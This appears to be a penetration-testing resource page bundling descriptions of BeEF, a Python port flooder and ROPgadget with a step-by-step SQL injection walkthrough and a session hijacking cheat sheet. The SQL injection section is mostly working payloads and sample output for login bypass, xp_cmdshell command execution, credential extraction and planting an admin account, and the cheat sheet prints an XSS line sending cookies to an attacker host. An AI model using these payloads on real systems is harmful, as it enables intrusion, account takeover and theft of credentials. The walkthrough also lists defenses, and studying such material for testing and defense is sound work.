BeEF

Link & Download: BeEF This tool is free to use!

---

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Our recommended tutorial and video for BeEF

Moihack Port-Flooder

A simple TCP/UDP Port Flooder written in Python. 

Description

This is a simple Port Flooder written in Python 3.2

Use this tool to quickly stress test your network devices and measure your router's or server's load.

Features are available in features section below.

Moihack DoS Attack Tool was the name of the 1st version of the program.
Moihack Port-Flooder is the Reloaded Version of the program with major code rewrite and changes. Code is much smaller in size now - from about 130 pure lines of codes to 35 lines only.

To run it you must have Python 3.2 or newer installed.Tested this on Windows,but guess it will work in Linux also,since there are not any OS specific lines in the code.

This tool was only written for personal tests and usage! It was NOT written to DDoS other people and/or cause harm to hardware.I am NOT responsible for any kind of damage you make by using this software.

DarkSec Link

 

ROPgadget - Gadgets finder and auto-roper

Description

This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, PowerPC, SPARC and MIPS architectures. Since the version 5, ROPgadget has a new core which is written in Python using Capstone disassembly framework for the gadgets search engine - The older version can be found in the Archives directory but it will not be maintained.
GitHub https://github.com/JonathanSalwan/ROPgadget

Change Log

v5.4:     Fix: bug e_shstrndx = UNDEF
          Add: gadget intel x64 - 0F05 syscall
          Add: gadget arm64 - ret reg
          Add: gadget arm64 - bl/blr reg
          Add: gadget intel x64 - jmp/call [reg+imm]
          Add: Improve performance around the search engine
          Add: Python3 support
          Add: test suite file

v5.3:     Fix: some Bugs
          Fix: Use segment instead of section to find gadgets
          Add: --all option
          Add: --multibr option
          Add: --offset option
          Add: --rawArch option 
          Add: --rawMode option
          Add: pypi setup install
          Add: support for Universal binaries on OS X 
          Add: more console commands
          Add: Add ARM64 gadgets
          Add: x86_64 ROP chain generation 
          Add: more x86 branch instructions
          Update: design

v5.1:     Bug fix: Aligning Instruction
          Add: --badbytes option
          Add: System gadget for MIPS arch
          Fix: JOP PPC

v5.0:     Restart from scratch
          New core in Python using Capstone Framework
          Support ARM, x86, x64, MIPS, Sparc and PowerPC
          Suport Mach-O, PE and ELF
          Add console mode

v4.0.3:   Made searching for gadgets faster by dark-rose

v4.0.2:   Bug fix genInstrX86.
          Bug fix by cao - comparison in gadget search for gadgets with null character

v4.0.1:   Update python3 to python2.
          Add new script python to generate gadgets table 32 and 64 bits.
          Update default syntax to Intel.
          genInstrX86.py: Add severals pop + ret combination

v4.0.0:   Addition of 64 bit linux support for ROP exploit generation.
          Addition of 64 bit support for ROP gadget searching.
          Addition of Windows PE file loading for gadget searching.
          Addition of detection of shared libraries and improved code gen for them.
          Generation of execve ROP exploits with arbitrary argument vectors.
          Payload generation in PHP, C and Perl as well as improved generation for python.
          Color disable/enable switch.
          Improved user friendliness.
          Vastly increased ROP searching speed.
          Code restructuring for easing addition of new architectures/platforms.
          General refacoring and code friendiness.

v3.4.1:   Bug Fix in module importsc with intel syntax
v3.4.0:   Feature - Support Att and intel syntax
v3.3.4:   Bug Fix - Fake positive (github issue)
v3.3.3:   Bug Fix in the supported architecures. (src/check_arch_supported.c)
v3.3.2:   Bug Fix (Buffer Overflow - src/check_bind_mode.c)
v3.3.1:   Segmentation Fault fixed, on compilation x86 64 bits (src/varop.c)
v3.3:     New Core and news features.

How to install

$ git clone -b master http://github.com/JonathanSalwan/ROPgadget.git
$ cd ROPgadget
$ cd ./dependencies/capstone-next
$ ./make.sh
$ sudo ./make.sh install
$ cd ./bindings/python
$ make
$ sudo make install

Usage

usage: ROPgadget.py [-h] [-v] [--binary <binary>] [--opcode <opcodes>]
                    [--string <string>] [--memstr <string>] [--depth <nbyte>]
                    [--only <key>] [--filter <key>] [--range <start-end>]
                    [--thumb] [--console] [--norop] [--nojop] [--nosys]

optional arguments:
  -h, --help           show this help message and exit
  -v, --version        Display the ROPgadget's version
  --binary <binary>    Specify a binary filename to analyze
  --opcode <opcodes>   Searh opcode in executable segment
  --string <string>    Search string in readable segment
  --memstr <string>    Search each byte in all readable segment
  --depth <nbyte>      Depth for search engine (default 10)
  --only <key>         Only show specific instructions
  --filter <key>       Suppress specific instructions
  --range <start-end>  Search between two addresses (0x...-0x...)
  --thumb              Use the thumb mode for the search engine. (ARM only)
  --console            Use an interactive console for search engine
  --norop              Disable ROP search engine
  --nojop              Disable JOP search engine
  --nosys              Disable SYS search engine

console commands:
  display              Display all gadgets
  help                 Display the help
  load                 Load all gadgets
  quit                 Quit the console mode
  search               Search specific keywords or not

Screenshot

Intel x64

ARM v7

Sparc v8

MIPS

PowerPC

ROP chain generation

SQL Injection Walkthrough

1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>

Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).


2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
 - Login: hi' or 1=1--
 - Pass: hi' or 1=1--
 - http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>

If luck is on your side, you will get login without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
 - Input from users
 - Parameters from URL
 - Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask


9.0 Where can I get more info?
One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

Session Hijacking Cheat Sheet

‘Session Hijacking’ is an old and routine topic in the field of application security. To make it more interesting, in this article, we are going to focus on different ways it can be performed.
Introduction for beginners
Web applications communicate using HTTP protocol. HTTP is stateless, which means there is no support at the protocol level to identify the state of a particular request. In other words, web servers don’t have any mechanism to know whether the request is coming from a new client from a client which is already communicating with it. So from the server perspective, every request it receives is a new request. For instance, let us say a client logged into his Facebook account by sending his credentials. Now if he wishes to see his messages, he has to send his credential information again, because the server doesn’t normally know that he was already authenticated in the previous request. This is something that developers have to do themselves. This is called ‘Session Tracking’.
How can sessions be tracked?
Sessions are tracked by developers primarily through the use of session identifiers (SIDs). Once the user is successfully authenticated, a session ID is created by the server and maintained by the server. From there on, for every request this value is checked to track the user. In other words, session IDs are used as an authentication token so that user does not have to re-enter the credential information with every request.
Based on how this SID this sent and received, there are 3 mechanisms to track sessions.

1. Cookies:
   The SID is created and maintained in the server and sent to the user through cookies. A cookie is stored in the user’s hard disk and goes with each request. The server verifies the same before executing the request. This is the most widely used mechanism and we are going to talk more about this in the below sections.
2. URL Rewriting:
   In this the SID value actually goes in the URL of each request. This kind of session tracking is difficult, as we need to keep track of the parameter as a chain link until the conversation completes.
3. Hidden Fields:
   Hidden fields are elements which are not directly visible to the user. They can be viewed by looking at the page source. Interestingly, they can also be used for session management, as SID values can be stored in hidden fields and can be sent to the server with each request. This sort of mechanism is rarely used these days.

Among these methods, cookies are most widely used method for session management. For remaining part of this article we will assume that we are talking about cookies when we talk about ‘session’.
What is Session Hijacking?
Session hijacking, as the name suggests, is all about knowing the session ID (SID) of an active user so that his account can be impersonated or hijacked. After a user enters his credentials, the application tries to identify him only based on his cookie value (which contains the SID). Hence, if this SID value of any active user is known to us, we can use the same and login to the application as a victim and thus get access to all of the information. And if session ID is gone, everything is gone!
Session Hijacking Cheat Sheet
Let us now take a look at different ways or scenarios in which active sessions can be hijacked.
Session sidejacking
If the application does not use SSL and transports the data in plain text, then anyone within the same network can grab the cookie values just by sniffing the traffic using tools such as Wireshark. There are a few cases worth mentioning here:

1. SSL only for login page: Of course if there is no SSL then the credentials too would be gone (forget about cookies!), but there are some developers who use SSL for the login page alone, assuming that the credentials are transported safely. But once the user is authenticated, it is the cookies (that go with each request) that identify him. All the requests that are done after logging in contain cookies, and if they are not protected with SSL, the session can be easily hijacked. Thus the password may not be stolen, but the session can be hijacked.
2. Single URL is enough to hijack a user: There are several cases where the application uses HTTP to fetch image or JS files that belong to same domain. The problem is when you send a request to a domain in which you are already signed in, the cookies would automatically go. That is how the cookies work. So in simple words, even if there is a single link which goes to the server without HTTPS, the cookies would go along with it and can be grabbed by an attacker who is sniffing the network.

Session fixation
Session fixation is an attack where the attacker fixes the session in advance and just waits for the user to login in order to hijack it. This is very much applicable to the SIDs in the URL scenario. If the application associates a user with an incoming SID without checking if it is generated by the server, then this attack is possible.

1. An attacker logs into the site www.vulnerablesite.com. The server sets a cookie value and returns it to him, say Set-Cookie: SID=adfajkdfjer23411sdfadf
2. The attacker now sends a link to the victim, http://www.vulnerablesite.com/test.php?SID= adfajkdfjer23411sdfadf
3. The victim logs on and the server now assigns the SID value to him. (Why? Due to bad coding, the server does not check if it is generated by itself and tags it with the users).
4. The attacker, who already knows the SID value he used, can now just use the same and access the victim’s account.

Generating cookies before authentication
Cookies are supposed to be generated (or at least changed) after successful authentication. If the same cookie which is generated before authentication is used after authentication, then session hijacking is possible, as explained here with a simple example. This is mostly exploitable in a public café or shared computers scenario.

1. An attacker visits the site www.vulnerablesite.com. The server sets a cookie value and returns it to him, say Set-Cookie: SID=randomqrrqwer234234234
2. The attacker notes down this value and leaves the system, keeping the page open.
3. The victim now logs into the same site. Cookie value does not change after authentication.
4. The attacker, who already has the cookie value, can access the victim’s account.

Predictable session IDs
By analyzing the pattern of session IDs, an attacker can predict the session ID of a logged in user and thus hijack his account. For example, consider the below session cookie set by an application.
Set-Cookie: sessionid=dG9tOm1hbmFnZXI=
Although this seems to be random at first look, it is not actually! Base 64 decoding of the above value gives the below data.
Base64 Decode [dG9tOm1hbmFnZXI=] = tom:manager
Thus an attacker can study this pattern and construct a valid cookie, for instance something like Base64 Decode [admin:admin]. Similarly, if the session IDs are not random enough, an attacker can try to brute force them to gain access to the application.
Using Cross Site Scripting vulnerability
This article assumes that the reader is aware of what an XSS attack is about. So we are going to take a look at how XSS can be used to steal SID or cookie value. In simple words, XSS allows an attacker to execute scripts (such as JavaScript) on an end user’s browser. Hence an attacker just needs to write a script that can access the cookie value and send it to a server he owns. The below script does the same thing. It hits the attacker’s site with the cookie value. Accessing the cookie on the client side is possible through use of document.cookie.
http://www.vulnerablesite.com/xssvulnerablepage.jsp?name=<script>document.location= “http://www.attackersite.com/cookie_grab.php?c=” + document.cookie</script>
Ethical Hacking Training – Resources
Session puzzle attacks
This vulnerability occurs when an application uses the same session variable for more than one purpose. Here an attacker tries to access the pages in a particular order so that the session variable is set in one context and then used in another. This is best explained in the below scenario.

1. An attacker visits the application and clicks on the ‘Forgot Password’ link.
2. Now he enters some other user’s ID (say admin) and clicks submit.
   
3. After this the attacker just requests some internal page such as viewprofile.jsp and he logs in as admin.

This worked because the application wrongly sets the session attribute when the forgot password process is initiated. The attacker takes advantage of this and exploits it by requesting it in a sequence. These types of vulnerabilities are more difficult to identify through normal testing, and hence source code reviews are the best way to look out for such vulnerabilities.
Improper logout implementation
When a user clicks on the logout button, the application is supposed to destroy all the session variables that are handled on the server side. But instead, some developers just delete the cookies from the client side using client side code. This seems to work fine when you browse normally, because once the cookies are removed from the machine it will redirect to login page, but the session on the server is active indefinitely. This means that an attacker who can grab this value can still access the application. This scenario increases the time period an attacker can launch attacks over valid sessions.
Lack of session expiration mechanism
All applications should track idle sessions and automatically redirect the user to a login page upon session timeout. Failure to do so would not only increase the time period an attacker can launch attacks, but also grant access to the application if he has physical access to that machine. Once again, this session expiration must be done at the server level and not just at the client level.